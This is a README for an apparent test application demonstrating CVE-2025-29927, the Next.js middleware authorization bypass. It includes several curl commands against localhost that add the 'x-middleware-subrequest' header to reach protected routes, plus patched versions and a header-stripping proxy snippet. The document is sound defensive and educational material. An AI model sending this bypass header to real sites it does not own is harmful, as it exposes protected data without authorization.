# Next.js Middleware Vulnerability Tester (CVE-2025-29927)
This application demonstrates the Next.js middleware authorization bypass vulnerability (CVE-2025-29927).
## About The Vulnerability
CVE-2025-29927 is an authorization bypass vulnerability in Next.js middleware. By sending a specially crafted HTTP header (`x-middleware-subrequest`), an attacker can bypass authorization checks implemented in the middleware, potentially gaining access to protected resources.
## Setup Instructions
1. Install dependencies:
```
cd /var/www/react-nextjs/test-middleware-skip
npm install
```
2. Run the development server:
```
npm run dev
```
3. The server will start on http://localhost:3000
## Testing the Vulnerability
### Normal Access (Should be Blocked)
Try accessing the protected route normally:
```
npm run test-normal
```
or
```
curl -v http://localhost:3000/protected-data
```
You should receive a 401 Unauthorized response, as the middleware blocks access.
### Exploiting the Vulnerability
Try accessing the protected route with the exploit header:
```
npm run test-exploit
```
or
```
curl -v -H "x-middleware-subrequest: middleware" http://localhost:3000/protected-data
```
If the application is vulnerable, you'll receive a 200 OK response with the protected data.
### Testing the API Route
Normal access (should be blocked):
```
curl -v http://localhost:3000/api/protected
```
With exploit:
```
curl -v -H "x-middleware-subrequest: middleware" http://localhost:3000/api/protected
```
## Remediation
To fix this vulnerability, you should:
1. Update Next.js to a patched version:
   - Next.js 15.x: Update to 15.2.3 or later
   - Next.js 14.x: Update to 14.2.25 or later
   - Next.js 13.x: Update to 13.5.9 or later
   - Next.js 12.x: Update to 12.3.5 or later
2. If you cannot update, implement a reverse proxy (like Nginx or Cloudflare) that strips the `x-middleware-subrequest` header from incoming requests.
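A minimal Node.js version of the header-stripping proxy from step 2, added here as an example; it is not part of the original repository. It assumes Next.js listens on 127.0.0.1:3000 as in the setup steps, and `stripSubrequestHeader` and `createStripProxy` are names chosen for this example.

```javascript
// Added example: reverse proxy that drops x-middleware-subrequest before
// the request reaches Next.js. Not code from the original repository.
const http = require('node:http');

const BLOCKED_HEADER = 'x-middleware-subrequest'; // header named in this README

// Return a copy of the headers without the blocked header. The name is matched
// case-insensitively because HTTP header names are case-insensitive.
function stripSubrequestHeader(headers) {
  const clean = {};
  for (const [name, value] of Object.entries(headers)) {
    if (name.toLowerCase() !== BLOCKED_HEADER) clean[name] = value;
  }
  return clean;
}

// Build a proxy server that forwards every request to the Next.js upstream
// with the sanitized header set.
function createStripProxy(upstreamHost, upstreamPort) {
  return http.createServer((req, res) => {
    const upstream = http.request(
      {
        host: upstreamHost,
        port: upstreamPort,
        method: req.method,
        path: req.url,
        headers: stripSubrequestHeader(req.headers),
      },
      (upstreamRes) => {
        res.writeHead(upstreamRes.statusCode, upstreamRes.headers);
        upstreamRes.pipe(res);
      }
    );
    // Fail closed with 502 if the upstream is unreachable.
    upstream.on('error', () => {
      if (!res.headersSent) res.writeHead(502);
      res.end('Bad gateway');
    });
    req.pipe(upstream);
  });
}

// Start only when a listen port is given on the command line.
const listenPort = Number(process.argv[2]);
if (listenPort) {
  // Assumption: Next.js runs on 127.0.0.1:3000, as in the setup steps.
  createStripProxy('127.0.0.1', 3000).listen(listenPort);
}
```

Saved under a file name of your choice (for example `strip-proxy.js`), it starts with `node strip-proxy.js 8080`. The mitigation only holds if clients can reach the proxy port and cannot connect to port 3000 directly.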
## Additional Test Commands
Test if the API route is vulnerable:
```
# Normal request (should be blocked)
curl -v http://localhost:3000/api/protected
# With exploit header
curl -v -H "x-middleware-subrequest: middleware" http://localhost:3000/api/protected
```
## Disclaimer
This tool is provided for educational and security testing purposes only. Use it to verify if your own Next.js applications are vulnerable and need patching.